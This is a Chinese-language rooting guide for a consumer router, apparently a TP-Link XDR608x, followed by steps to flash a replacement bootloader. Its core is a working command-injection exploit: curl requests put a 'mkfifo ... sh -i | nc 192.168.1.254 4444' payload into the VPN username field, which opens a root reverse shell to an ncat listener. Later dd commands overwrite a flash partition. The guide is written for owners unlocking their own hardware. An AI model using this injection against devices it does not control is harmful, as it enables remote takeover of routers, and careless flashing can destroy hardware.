root 方法:
- 安装 nmap,我们主要是要用到里面的 ncat
- 打开一个终端窗口,运行
ncat -nvlp 4444
,开始侦听 - 按 F12 打开浏览器调试控制台,找到形如
http://192.168.1.1/stok=
的 URL,chrome 浏览器的话,在“网络”标签页找到“名称”是 “ds” 的请求,单击它,然后在右侧窗口单击“标头”就可以看到了/ds - 接下来,如果你是用的 Windows,在 WSL 终端里进行以下操作。而 Linux 或 macOS 的终端本身可以直接操作
- 先把 stok 存入环境变量
export stok=
然后运行以下命令
curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","name":"user_1","para":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"0"}},"method":"add"}'
如果成功运行,则会返回 {"error_code":0}
继续运行以下命令
curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"user_1":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"1"}},"method":"set"}'
如果成功运行,则会返回 {"error_code":0}
此时,在步骤2中打开的终端窗口中,你应该会看到如下提示:
sh: can't access tty; job control turned off
BusyBox v1.19.4 (2022-07-20 12:29:22 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ #
这就成功地开启了具有 root 权限的控制台命令行提示符了。
-----------------------------------------------------------------------------------------------------------
原厂固件获取 root ssh 后,先用 winscp 把解压后的文件上传到路由器的 /tmp 运行以下命令即可
cd /tmp
dd bs=131072 conv=sync of=/dev/mtdblock9 if=xdr608x-bl2.bin
dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=xdr608x-fip.bin
sync
重启后即可按住 reset 进入 http://192.168.1.1 的uboot web 界面中,刷入 sysupgrade 格式或者官方格式的固件均可以